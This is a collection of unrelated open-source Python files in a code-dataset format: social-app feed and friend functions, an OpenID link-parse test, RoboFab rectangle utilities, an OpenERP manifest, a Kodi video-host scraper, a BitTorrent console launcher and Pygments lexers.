        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        if (int)(since_id) > 0:
            # Statuses with id > since_id posted by user or any friend.
            statuses = Status.objects.filter(Q(from_user = user) | Q(from_user__in = user.friends.all()) ,id__gt = since_id).order_by("id")[0 : count]
            for status in statuses:
                status.pics = picsWithText(status.pics)
            # Largest id (newest) first.
            statuses = sorted(statuses, key=lambda s1:-s1.id)[0 : count]
            return {"statuses" : statuses}
        else:
            # Most recent statuses posted by user or any friend.
            statuses = Status.objects.filter(Q(from_user = user) | Q(from_user__in = user.friends.all())).order_by("-id")[0 : count]
            for status in statuses:
                status.pics = picsWithText(status.pics)
            # Largest id (newest) first.
            statuses = sorted(statuses, key=lambda s1:-s1.id)[0 : count]
            return {"statuses" : statuses}
    except:
        return None
# 通过access_token 获得 status id大于since_id的数据, 并且不多于 count 条
def queryOldStatuses(max_id, access_token, count):
    """Fetch up to *count* statuses with id < max_id from user or friends.

    Returns {"statuses": [...]} (newest first), -1 for a bad token,
    None on error.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        # Statuses with id < max_id posted by user or any friend.
        statuses = Status.objects.filter(Q(from_user = user) | Q(from_user__in = user.friends.all()), id__lt = max_id).order_by("-id")[0 : count]
        for status in statuses:
            status.pics = picsWithText(status.pics)
        # Largest id (newest) first.
        statuses = sorted(statuses, key=lambda s1:-s1.id)[0 : count]
        return {"statuses" : statuses}
    except:
        return None
# 处理图片(pics) 数组
def picsWithText(text, _url_regex=re.compile(
        r'^(?:http|ftp)s?://'
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
        r'localhost|'
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
        r'(?::\d+)?'
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)):
    """Split a space-separated pics field and keep only valid URLs.

    The URL pattern is compiled once and bound as a default argument
    instead of being recompiled on every call (this function runs for
    every status returned by the feed queries).
    """
    return [pic for pic in text.split(" ") if _url_regex.match(pic)]
# Add one comment to a status.
def insertComment(text, access_token, s_id):
    """Create a comment on status s_id by the token's user.

    Returns -1 for an unknown token, -2 for a missing status,
    {"comment": comment} on success, or None on any other failure.
    """
    try:
        from_user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        status = Status.objects.get(id = s_id)
    except:
        return -2
    try:
        comment = Comment()
        comment.text = safestr(text)  # sanitize user-supplied text
        comment.status = status
        comment.from_user = from_user
        comment.save()
        return {"comment" : comment}
    except:
        return None
# Fetch every comment of one status.
def queryComments(s_id):
    """Return {"comments": queryset} for status s_id, newest comment first.

    Returns -2 when the status does not exist, None on any other failure.
    """
    try:
        status = Status.objects.get(id = s_id)
    except:
        return -2
    try:
        comments = status.comment_set.all().order_by('-id')
        return {"comments" : comments}
    except:
        return None
# Send a friend request.
def addFriend(text, access_token, to_user):
    """Create a pending friend request from the token's user to uid *to_user*.

    Error codes: -1 unknown token, -2 unknown target uid, -3 self-request,
    -4 already friends, -5/-6 a pending request already exists in either
    direction.  Returns {"newfirend": request} on success, None otherwise.
    (The 'newfirend' spelling is a pre-existing typo kept for API stability.)
    """
    try:
        from_user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        to_user = User.objects.get(uid = to_user)
    except:
        return -2
    try:
        if to_user.uid == from_user.uid:
            return -3
        if from_user in to_user.friends.all():
            return -4
        # Prevent duplicate pending requests (either direction).
        newfirends = from_user.newfriends.filter(to_user = to_user, status = 0)
        if newfirends.count() != 0:
            return -5
        newfirends = to_user.newfriends.filter(to_user = from_user, status = 0)
        if newfirends.count() != 0:
            return -6
        newfirend = Newfriend()
        newfirend.text = safestr(text)
        newfirend.to_user = to_user
        newfirend.save()
        from_user.newfriends.add(newfirend)
        from_user.save()
        return {"newfirend" : newfirend}
    except:
        return None
# Handle (accept/reject) one pending friend request.
def dowithAddFriend(f_id, access_token, result):
    """Resolve friend request *f_id* with status *result* for the token's user.

    result == 2 means accepted: the two users are linked as friends and an
    automatic greeting message is sent back to the requester.
    Returns -1 for a bad token, -2 for a missing / foreign / already-handled
    request, {"newfirend": request} on success, or None on other failures.
    """
    try:
        to_user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        newfirend = Newfriend.objects.get(id = f_id)
    except:
        return -2
    try:
        # Only the addressee may act, and only while the request is pending.
        if newfirend.to_user.uid != to_user.uid or newfirend.status != 0:
            return -2
        newfirend.status = result
        newfirend.save()
        if result == 2:
            # Accepted: the requester is the (single) owner of this request.
            from_user = newfirend.user_set.all().first()
            to_user.friends.add(from_user)
            to_user.save()
            insertMessage("我已经同意你的好友请求了,开始对话吧!", 0, access_token, from_user.uid)
        return {"newfirend" : newfirend}
    except:
        return None
# Remove a friend.
def deleteFriend(to_user, access_token):
    """Remove uid *to_user* from the token user's friend list.

    Error codes: -1 unknown token, -2 unknown target uid, -3 self-removal,
    -4 not currently a friend.  Returns {"from_user": user} on success,
    None on any other failure.  NOTE(review): only from_user's side of the
    relation is removed here — presumably the m2m is symmetric; verify.
    """
    try:
        from_user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        to_user = User.objects.get(uid = to_user)
    except:
        return -2
    try:
        if to_user.uid == from_user.uid:
            return -3
        if from_user not in to_user.friends.all():
            return -4
        from_user.friends.remove(to_user)
        from_user.save()
        return {"from_user" : from_user}
    except:
        return None
# Fetch every pending friend request addressed to the token's user.
def newFriends(access_token):
    """Return {"newfriends": queryset} of pending (status == 0) requests.

    Returns -1 for an unknown token, None on any other failure.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        newfriends = Newfriend.objects.filter(to_user = user, status = 0)
        return {"newfriends" : newfriends}
    except:
        return None
# Fetch the friend list.
def queryFriendList(access_token):
    """Return {"friendlist": queryset} of the token user's friends,
    ordered by name then uid, both descending.

    Returns -1 for an unknown token, None on any other failure.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        friendlist = user.friends.all().order_by("-name", "-uid")
        return {"friendlist" : friendlist}
    except:
        return None
# Search for strangers (users that are not yet friends).
def querySearch(access_token, key, page):
    """Search users by uid/name substring, excluding self and existing friends.

    Results are paged 10 per *page* (0-based).  Returns -1 for an unknown
    token, {"users": queryset} on success, None on any other failure.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        # Build the exclusion list: self plus all current friends.
        myfriend_uid = list()
        myfriend_uid.append(user.uid)
        myfriend = user.friends.all()
        for f in myfriend:
            myfriend_uid.append(f.uid)
        users = User.objects.filter((Q(uid__icontains = key) | Q(name__icontains = key)) & ~Q(uid__in = myfriend_uid))[page * 10 : (page + 1) * 10]
        return {"users" : users}
    except:
        return None
# Fetch a user's profile.
def queryUserInfo(uid, access_token):
    """Return {"user": target, "isfriend": 0|1} for *uid*, as seen by the
    token's user.

    Returns -1 for an unknown token, -2 when the target uid does not exist.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        to_user = User.objects.get(uid = uid)
        isfriend = 0
        if to_user in user.friends.all():
            isfriend = 1
        return {"user" : to_user, "isfriend" : isfriend}
    except:
        return -2
# Update the user's profile fields:
#   name, age, sex, birthday, city
def updateUserInfo(access_token, name, age, sex, birthday, city):
    """Overwrite the token user's profile fields and save.

    Returns -1 for an unknown token, {"user": user} on success,
    None on any other failure (e.g. invalid field values at save time).
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        user.name = safestr(name)
        user.age = age
        user.sex = sex
        user.birthday = birthday
        user.city = safestr(city)
        user.save()
        return {"user" : user}
    except:
        return None
# Change the user's password.
def updateUserPwd(access_token, pwd, oldpwd):
    """Verify *oldpwd* and set *pwd* as the new password.

    Passwords are stored as md5(pwd + pwdfix); the access token is derived
    from uid + pwdfix + hashed pwd, so it rotates with the password.
    Returns -1 unknown token, -2 wrong old password, {"user": user} on
    success, None otherwise.  NOTE(review): unsalted-per-user MD5 is weak;
    consider a real password hash if this code is still in service.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        if user.pwd != hashlib.new("md5", oldpwd + pwdfix).hexdigest():
            return -2
        user.pwd = hashlib.new("md5", pwd + pwdfix).hexdigest()
        user.access_token = hashlib.new("md5", user.uid + pwdfix + user.pwd).hexdigest()
        user.save()
        return {"user" : user}
    except:
        return None
# Update the user's avatar.
def updateUserPhoto(access_token, photo):
    """Store *photo* (presumably a URL or file key — verify against caller)
    as the token user's avatar.

    Returns -1 for an unknown token, {"user": user} on success, None otherwise.
    """
    try:
        user = User.objects.get(access_token = access_token)
    except:
        return -1
    try:
        user.photo = photo
        user.save()
        return {"user" : user}
    except:
        return None
# Obtain a Qiniu upload credential; *key* is the target file name.
def getQiniu_token(key):
    """Return {"token": upload_token} signed with the module's Qiniu keys."""
    q = Auth(access_key, secret_key)
    token = q.upload_token(bucket_name, key)
    return {"token" : token}
kawamon/hue | desktop/core/ext-py/python-openid-2.2.5/openid/test/linkparse.py | 87 | 2894 | from openid.consumer.html_parse import parseLinkAttrs
import os.path
import codecs
import unittest
def parseLink(line):
    """Parse one 'Link:' / 'Link*:' expectation line.

    Returns (optional, attrs) where *optional* is True for 'Link*:' and
    *attrs* maps attribute name -> (attr_optional, value); a trailing '*'
    on an attribute name marks it optional and is stripped.
    """
    parts = line.split()
    is_optional = (parts[0] == 'Link*:')
    assert is_optional or parts[0] == 'Link:'
    attrs = {}
    for pair in parts[1:]:
        key, value = pair.split('=', 1)
        if key.endswith('*'):
            attrs[key[:-1]] = (1, value)
        else:
            attrs[key] = (0, value)
    return (is_optional, attrs)
def parseCase(s):
    """Split one test case into (description, markup, expected_links).

    The case text is a header (a 'Name: ...' line plus Link lines),
    a blank line, then the HTML markup under test.
    """
    header, markup = s.split('\n\n', 1)
    header_lines = header.split('\n')
    name_line = header_lines.pop(0)
    assert name_line.startswith('Name: ')
    return name_line[6:], markup, map(parseLink, header_lines)
def parseTests(s):
    """Parse the whole linkparse data file.

    Returns (declared_test_count, cases) where each case is
    (desc, markup, links, raw_case_text).  Cases are separated by two
    blank lines; the trailing chunk after the last separator is ignored.
    """
    chunks = s.split('\n\n\n')
    header = chunks.pop(0)
    tests_line, _ = header.split('\n', 1)
    key, value = tests_line.split(': ')
    assert key == 'Num Tests'
    declared = int(value)
    parsed = []
    for chunk in chunks[:-1]:
        desc, markup, links = parseCase(chunk)
        parsed.append((desc, markup, links, chunk))
    return declared, parsed
class _LinkTest(unittest.TestCase):
    """One data-driven test: run parseLinkAttrs over *case* markup and match
    the result against the expected link list, honoring optional links and
    optional attributes."""

    def __init__(self, desc, case, expected, raw):
        unittest.TestCase.__init__(self)
        self.desc = desc          # human-readable test name
        self.case = case          # HTML markup to parse
        self.expected = expected  # list of (optional, attrs) from parseLink
        self.raw = raw            # original case text (for debugging)

    def shortDescription(self):
        return self.desc

    def runTest(self):
        actual = parseLinkAttrs(self.case)
        i = 0
        for optional, exp_link in self.expected:
            # Optional expected links may simply be absent from the output.
            if optional:
                if i >= len(actual):
                    continue

            act_link = actual[i]
            for k, (o, v) in exp_link.items():
                if o:
                    # Optional attribute: skip silently when missing.
                    act_v = act_link.get(k)
                    if act_v is None:
                        continue
                else:
                    act_v = act_link[k]

                if optional and v != act_v:
                    # Mismatch on an optional link: assume the link itself is
                    # absent and retry this actual entry with the next
                    # expected link (the for/else below is skipped).
                    break

                self.assertEqual(v, act_v)
            else:
                # All attributes matched: consume this actual link.
                i += 1

        # Every parsed link must have been accounted for.
        assert i == len(actual)
def pyUnitTests():
    """Build a TestSuite from the cases in linkparse.txt (next to this file).

    A leading sanity check asserts that the number of parsed cases matches
    the count declared in the data file's header.
    """
    here = os.path.dirname(os.path.abspath(__file__))
    test_data_file_name = os.path.join(here, 'linkparse.txt')
    test_data_file = codecs.open(test_data_file_name, 'r', 'utf-8')
    test_data = test_data_file.read()
    test_data_file.close()

    num_tests, test_cases = parseTests(test_data)

    tests = [_LinkTest(*case) for case in test_cases]

    def test_parseSucceeded():
        assert len(test_cases) == num_tests, (len(test_cases), num_tests)

    check_desc = 'Check that we parsed the correct number of test cases'
    check = unittest.FunctionTestCase(
        test_parseSucceeded, description=check_desc)
    tests.insert(0, check)

    return unittest.TestSuite(tests)
if __name__ == '__main__':
    # Run the linkparse suite directly with the plain text runner.
    suite = pyUnitTests()
    runner = unittest.TextTestRunner()
    runner.run(suite)
| apache-2.0 |
daltonmaag/robofab | Lib/robofab/misc/arrayTools.py | 9 | 5159 | #
# Various array and rectangle tools, but mostly rectangles, hence the
# name of this module (not).
#
"""
Rewritten to elimate the numpy dependency
"""
import math
def calcBounds(array):
    """Return the bounding rectangle of a 2D points array as a tuple:
    (xMin, yMin, xMax, yMax); all zeros for an empty array.
    """
    if not array:
        return 0, 0, 0, 0
    xs = [pt[0] for pt in array]
    ys = [pt[1] for pt in array]
    return min(xs), min(ys), max(xs), max(ys)
def updateBounds(bounds, (x, y), min=min, max=max):
    """Return the bounding rectangle of *bounds* grown to contain point (x, y).

    Python 2 tuple-parameter syntax; ``min``/``max`` are bound as default
    arguments as a lookup-speed micro-optimization.
    """
    xMin, yMin, xMax, yMax = bounds
    return min(xMin, x), min(yMin, y), max(xMax, x), max(yMax, y)
def pointInRect((x, y), rect):
    """Return True when point (x, y) is inside *rect* (borders inclusive).

    Python 2 tuple-parameter syntax.
    """
    xMin, yMin, xMax, yMax = rect
    return (xMin <= x <= xMax) and (yMin <= y <= yMax)
def pointsInRect(array, rect):
    """Determine which points of *array* lie inside *rect* (borders inclusive).

    Returns a list with one boolean per point; an empty list for no points.
    """
    if len(array) < 1:
        return []
    xMin, yMin, xMax, yMax = rect
    flags = []
    for x, y in array:
        flags.append((xMin <= x <= xMax) and (yMin <= y <= yMax))
    return flags
def vectorLength(vector):
    """Return the Euclidean length of the given 2D vector.

    Uses math.hypot, which computes sqrt(x*x + y*y) without the
    intermediate overflow/underflow that squaring the components first
    can cause for very large or very small values.
    """
    x, y = vector
    return math.hypot(x, y)
def asInt16(array):
    """Round each value to the nearest integer (ties round up) and cast to int."""
    return [int(math.floor(value + 0.5)) for value in array]
def normRect((xMin, yMin, xMax, yMax)):
    """Normalize the rectangle so that the following holds:
        xMin <= xMax and yMin <= yMax
    (Python 2 tuple-parameter syntax.)
    """
    return min(xMin, xMax), min(yMin, yMax), max(xMin, xMax), max(yMin, yMax)
def scaleRect((xMin, yMin, xMax, yMax), x, y):
    """Scale the rectangle by factors x (horizontal) and y (vertical)."""
    return xMin * x, yMin * y, xMax * x, yMax * y
def offsetRect((xMin, yMin, xMax, yMax), dx, dy):
    """Offset (translate) the rectangle by dx, dy."""
    return xMin+dx, yMin+dy, xMax+dx, yMax+dy
def insetRect((xMin, yMin, xMax, yMax), dx, dy):
    """Inset the rectangle by dx, dy on all sides (negative values grow it)."""
    return xMin+dx, yMin+dy, xMax-dx, yMax-dy
def sectRect((xMin1, yMin1, xMax1, yMax1), (xMin2, yMin2, xMax2, yMax2)):
    """Return a boolean and a rectangle. If the input rectangles intersect, return
    True and the intersecting rectangle. Return False and (0, 0, 0, 0) if the input
    rectangles don't intersect.

    Note: the flags are returned as the ints 1/0, and rectangles that merely
    touch (shared edge) do NOT count as intersecting.
    """
    xMin, yMin, xMax, yMax = (max(xMin1, xMin2), max(yMin1, yMin2),
                              min(xMax1, xMax2), min(yMax1, yMax2))
    if xMin >= xMax or yMin >= yMax:
        return 0, (0, 0, 0, 0)
    return 1, (xMin, yMin, xMax, yMax)
def unionRect((xMin1, yMin1, xMax1, yMax1), (xMin2, yMin2, xMax2, yMax2)):
    """Return the smallest rectangle in which both input rectangles are fully
    enclosed. In other words, return the total bounding rectangle of both input
    rectangles.
    """
    xMin, yMin, xMax, yMax = (min(xMin1, xMin2), min(yMin1, yMin2),
                              max(xMax1, xMax2), max(yMax1, yMax2))
    return (xMin, yMin, xMax, yMax)
def rectCenter((xMin, yMin, xMax, yMax)):
    """Return the center of the rectangle as an (x, y) coordinate.

    Note: uses Python 2 `/` semantics — integer inputs yield floored integer
    coordinates (see the (0,0,100,200) -> (50,100) doctest below).
    """
    return (xMin+xMax)/2, (yMin+yMax)/2
def intRect((xMin, yMin, xMax, yMax)):
    """Return the rectangle, rounded off to integer values, but guaranteeing that
    the resulting rectangle is NOT smaller than the original
    (min corner floored, max corner ceiled).
    """
    import math  # redundant with the module-level import; kept as-is
    xMin = int(math.floor(xMin))
    yMin = int(math.floor(yMin))
    xMax = int(math.ceil(xMax))
    yMax = int(math.ceil(yMax))
    return (xMin, yMin, xMax, yMax)
def _test():
    """Doctest suite exercising every public helper in this module.

    >>> import math
    >>> calcBounds([(0, 40), (0, 100), (50, 50), (80, 10)])
    (0, 10, 80, 100)
    >>> updateBounds((0, 0, 0, 0), (100, 100))
    (0, 0, 100, 100)
    >>> pointInRect((50, 50), (0, 0, 100, 100))
    True
    >>> pointInRect((0, 0), (0, 0, 100, 100))
    True
    >>> pointInRect((100, 100), (0, 0, 100, 100))
    True
    >>> not pointInRect((101, 100), (0, 0, 100, 100))
    True
    >>> list(pointsInRect([(50, 50), (0, 0), (100, 100), (101, 100)], (0, 0, 100, 100)))
    [True, True, True, False]
    >>> vectorLength((3, 4))
    5.0
    >>> vectorLength((1, 1)) == math.sqrt(2)
    True
    >>> list(asInt16([0, 0.1, 0.5, 0.9]))
    [0, 0, 1, 1]
    >>> normRect((0, 10, 100, 200))
    (0, 10, 100, 200)
    >>> normRect((100, 200, 0, 10))
    (0, 10, 100, 200)
    >>> scaleRect((10, 20, 50, 150), 1.5, 2)
    (15.0, 40, 75.0, 300)
    >>> offsetRect((10, 20, 30, 40), 5, 6)
    (15, 26, 35, 46)
    >>> insetRect((10, 20, 50, 60), 5, 10)
    (15, 30, 45, 50)
    >>> insetRect((10, 20, 50, 60), -5, -10)
    (5, 10, 55, 70)
    >>> intersects, rect = sectRect((0, 10, 20, 30), (0, 40, 20, 50))
    >>> not intersects
    True
    >>> intersects, rect = sectRect((0, 10, 20, 30), (5, 20, 35, 50))
    >>> intersects
    1
    >>> rect
    (5, 20, 20, 30)
    >>> unionRect((0, 10, 20, 30), (0, 40, 20, 50))
    (0, 10, 20, 50)
    >>> rectCenter((0, 0, 100, 200))
    (50, 100)
    >>> rectCenter((0, 0, 100, 199.0))
    (50, 99.5)
    >>> intRect((0.9, 2.9, 3.1, 4.1))
    (0, 2, 4, 5)
    """
if __name__ == "__main__":
import doctest
doctest.testmod()
| bsd-3-clause |
ttfseiko/openerp-trunk | openerp/addons/decimal_precision/__openerp__.py | 179 | 1721 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# OpenERP addon manifest: a bare dict literal read by the server at
# module-discovery time (this file is __openerp__.py).
{
    'name': 'Decimal Precision Configuration',
    'description': """
Configure the price accuracy you need for different kinds of usage: accounting, sales, purchases.
=================================================================================================

The decimal precision is configured per company.
""",
    'author': 'OpenERP SA',
    'version': '0.1',
    'depends': ['base'],
    'category' : 'Hidden/Dependency',
    # XML views and access rules loaded on install/update.
    'data': [
        'decimal_precision_view.xml',
        'security/ir.model.access.csv',
    ],
    'demo': [],
    'installable': True,
    'images': ['images/1_decimal_accuracy_form.jpeg','images/1_decimal_accuracy_list.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
jose36/plugin.video.ProyectoLuzDigital | servers/upafile.py | 35 | 3133 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para upafile
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#------------------------------------------------------------
import urlparse,urllib2,urllib,re
import os
from core import scrapertools
from core import logger
from core import config
from core import unpackerjs
def test_video_exists( page_url ):
return True,""
def get_video_url( page_url , premium = False , user="" , password="", video_password="" ):
    """Resolve the direct media URL from an upafile page.

    The page embeds a packed (p,a,c,k,e,d) JavaScript player setup; this
    picks the packed script that mentions the media, unpacks it, and pulls
    the addVariable('file', ...) URL out.  Returns a list of
    [label, media_url] pairs (empty on no match).
    """
    logger.info("[upafile.py] get_video_url(page_url='%s')" % page_url)
    video_urls = []

    data = scrapertools.cache_page(page_url)
    # Example of the packed script being matched:
    # <script type='text/javascript'>eval(function(p,a,c,k,e,d){...}('11 0=10 z(\'2://4.3/6/6.y\',...)</script>
    patron = "<script type='text/javascript'>(eval\(function\(p,a,c,k,e,d\).*?)</script>"
    matches = re.compile(patron,re.DOTALL).findall(data)
    cifrado=""
    # Pick the first packed blob that looks like it carries the media URL.
    for match in matches:
        logger.info("match="+match)
        if "mp4" in match or "flv" in match or "video" in match:
            cifrado = match
            break

    # Unpack the JS and extract the video URL.
    # NOTE(review): if no blob matched, cifrado is "" and get_match below
    # will operate on an empty string — presumably raising/logging upstream.
    logger.info("cifrado="+cifrado)
    descifrado = unpackerjs.unpackjs(cifrado)
    descifrado = descifrado.replace("\\","")
    logger.info("descifrado="+descifrado)

    #s1.addVariable('file','http://s82.upafile.com:182/d/k65ufdsgg7pvam5r5o22urriqvsqzkkf4cu3biws2xwxsvgmrfkxwzx4/video.mp4')
    media_url = scrapertools.get_match(descifrado,"addVariable\('file','([^']+)'")

    if len(matches)>0:
        # Label is the file extension of the media URL plus the server tag.
        video_urls.append( [ scrapertools.get_filename_from_url(media_url)[-4:]+" [upafile]",media_url])

    for video_url in video_urls:
        logger.info("[upafile.py] %s - %s" % (video_url[0],video_url[1]))

    return video_urls
# Find this server's video links inside arbitrary page text.
def find_videos(data):
    """Scan *data* for upafile.com/<id> links.

    Returns a list of [title, url, server] triples, de-duplicated while
    preserving first-seen order.
    """
    encontrados = set()   # URLs already emitted (dedup)
    devuelve = []

    #http://upafile.com/idyoybh552bf
    data = urllib.unquote(data)
    patronvideos  = '(upafile.com/[a-z0-9]+)'
    logger.info("[upafile.py] find_videos #"+patronvideos+"#")
    matches = re.compile(patronvideos,re.DOTALL).findall(data)

    for match in matches:
        titulo = "[upafile]"
        url = "http://"+match
        if url not in encontrados:
            logger.info("  url="+url)
            devuelve.append( [ titulo , url , 'upafile' ] )
            encontrados.add(url)
        else:
            logger.info("  url duplicada="+url)

    return devuelve
| apache-2.0 |
sparkslabs/kamaelia | Sketches/RJL/bittorrent/BitTorrent/launchmany-console.py | 4 | 2524 | #!/usr/bin/env python
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by John Hoffman
if __name__ == '__main__':
    # Install gettext translations before any translatable strings are used.
    from BitTorrent.platform import install_translation
    install_translation()
import sys
import os
from BitTorrent.launchmanycore import LaunchMany
from BitTorrent.defaultargs import get_defaults
from BitTorrent.parseargs import parseargs, printHelp
from BitTorrent import configfile
from BitTorrent import version
from BitTorrent import BTFailure
# Exceptions reported by the core are collected here and dumped on exit.
exceptions = []

class HeadlessDisplayer:
    """Console UI for LaunchMany: prints one status line per torrent."""

    def display(self, data):
        # *data* is a list of per-torrent status tuples from launchmanycore.
        print ''
        if not data:
            self.message(_("no torrents"))
        for x in data:
            ( name, status, progress, peers, seeds, seedsmsg, dist,
              uprate, dnrate, upamt, dnamt, size, t, msg ) = x
            print '"%s": "%s" (%s) - %sP%s%s%.3fD u%0.1fK/s-d%0.1fK/s u%dK-d%dK "%s"' % (
                name, status, progress, peers, seeds, seedsmsg, dist,
                uprate/1000, dnrate/1000, upamt/1024, dnamt/1024, msg)
        # Return False: tell the caller not to stop the loop.
        return False

    def message(self, s):
        print "### "+s

    def exception(self, s):
        # Record for the final dump and flag it on the console.
        exceptions.append(s)
        self.message(_("SYSTEM ERROR - EXCEPTION GENERATED"))
if __name__ == '__main__':
    # Command-line entry point: parse config, run LaunchMany headless,
    # then dump the first collected exception (if any).
    uiname = 'launchmany-console'
    defaults = get_defaults(uiname)

    try:
        if len(sys.argv) < 2:
            printHelp(uiname, defaults)
            sys.exit(1)
        # Positional arg (if present) is the torrent directory.
        config, args = configfile.parse_configuration_and_args(defaults,
                                      uiname, sys.argv[1:], 0, 1)
        if args:
            config['torrent_dir'] = args[0]

        if not os.path.isdir(config['torrent_dir']):
            raise BTFailure(_("Warning: ")+args[0]+_(" is not a directory"))
    except BTFailure, e:
        print _("error: %s\nrun with no args for parameter explanations") % str(e)
        sys.exit(1)

    LaunchMany(config, HeadlessDisplayer(), 'launchmany-console')
    if exceptions:
        print _("\nEXCEPTION:")
        print exceptions[0]
unreal666/outwiker | plugins/markdown/markdown/markdown_plugin_libs/pygments/lexers/dsls.py | 6 | 33339 | # -*- coding: utf-8 -*-
"""
pygments.lexers.dsls
~~~~~~~~~~~~~~~~~~~~
Lexers for various domain-specific languages.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import ExtendedRegexLexer, RegexLexer, bygroups, words, \
include, default, this, using, combined
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Literal, Whitespace
__all__ = ['ProtoBufLexer', 'BroLexer', 'PuppetLexer', 'RslLexer',
'MscgenLexer', 'VGLLexer', 'AlloyLexer', 'PanLexer',
'CrmshLexer', 'ThriftLexer', 'FlatlineLexer', 'SnowballLexer']
class ProtoBufLexer(RegexLexer):
    """
    Lexer for `Protocol Buffer <http://code.google.com/p/protobuf/>`_
    definition files.

    .. versionadded:: 1.4
    """

    name = 'Protocol Buffer'
    aliases = ['protobuf', 'proto']
    filenames = ['*.proto']

    # State machine: 'root' scans everything; 'package'/'message'/'type'
    # each consume the single identifier that follows the introducing
    # keyword, then pop straight back to 'root'.
    tokens = {
        'root': [
            (r'[ \t]+', Text),
            (r'[,;{}\[\]()<>]', Punctuation),
            (r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single),
            (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline),
            (words((
                'import', 'option', 'optional', 'required', 'repeated', 'default',
                'packed', 'ctype', 'extensions', 'to', 'max', 'rpc', 'returns',
                'oneof'), prefix=r'\b', suffix=r'\b'),
             Keyword),
            (words((
                'int32', 'int64', 'uint32', 'uint64', 'sint32', 'sint64',
                'fixed32', 'fixed64', 'sfixed32', 'sfixed64',
                'float', 'double', 'bool', 'string', 'bytes'), suffix=r'\b'),
             Keyword.Type),
            (r'(true|false)\b', Keyword.Constant),
            (r'(package)(\s+)', bygroups(Keyword.Namespace, Text), 'package'),
            (r'(message|extend)(\s+)',
             bygroups(Keyword.Declaration, Text), 'message'),
            (r'(enum|group|service)(\s+)',
             bygroups(Keyword.Declaration, Text), 'type'),
            (r'\".*?\"', String),
            (r'\'.*?\'', String),
            (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
            (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
            (r'(\-?(inf|nan))\b', Number.Float),
            (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
            (r'0[0-7]+[LlUu]*', Number.Oct),
            (r'\d+[LlUu]*', Number.Integer),
            (r'[+-=]', Operator),
            (r'([a-zA-Z_][\w.]*)([ \t]*)(=)',
             bygroups(Name.Attribute, Text, Operator)),
            (r'[a-zA-Z_][\w.]*', Name),
        ],
        'package': [
            (r'[a-zA-Z_]\w*', Name.Namespace, '#pop'),
            default('#pop'),
        ],
        'message': [
            (r'[a-zA-Z_]\w*', Name.Class, '#pop'),
            default('#pop'),
        ],
        'type': [
            (r'[a-zA-Z_]\w*', Name, '#pop'),
            default('#pop'),
        ],
    }
class ThriftLexer(RegexLexer):
    """
    For `Thrift <https://thrift.apache.org/>`__ interface definitions.

    .. versionadded:: 2.1
    """
    name = 'Thrift'
    aliases = ['thrift']
    filenames = ['*.thrift']
    mimetypes = ['application/x-thrift']

    # 'root' dispatches; string states are combined with 'stringescape' so
    # escapes are highlighted inside both quote styles; 'namespace' and
    # 'class' grab one identifier then pop.
    tokens = {
        'root': [
            include('whitespace'),
            include('comments'),
            (r'"', String.Double, combined('stringescape', 'dqs')),
            (r'\'', String.Single, combined('stringescape', 'sqs')),
            (r'(namespace)(\s+)',
                bygroups(Keyword.Namespace, Text.Whitespace), 'namespace'),
            (r'(enum|union|struct|service|exception)(\s+)',
                bygroups(Keyword.Declaration, Text.Whitespace), 'class'),
            (r'((?:(?:[^\W\d]|\$)[\w.\[\]$<>]*\s+)+?)'  # return arguments
             r'((?:[^\W\d]|\$)[\w$]*)'                  # method name
             r'(\s*)(\()',                              # signature start
             bygroups(using(this), Name.Function, Text, Operator)),
            include('keywords'),
            include('numbers'),
            (r'[&=]', Operator),
            (r'[:;,{}()<>\[\]]', Punctuation),
            (r'[a-zA-Z_](\.\w|\w)*', Name),
        ],
        'whitespace': [
            (r'\n', Text.Whitespace),
            (r'\s+', Text.Whitespace),
        ],
        'comments': [
            (r'#.*$', Comment),
            (r'//.*?\n', Comment),
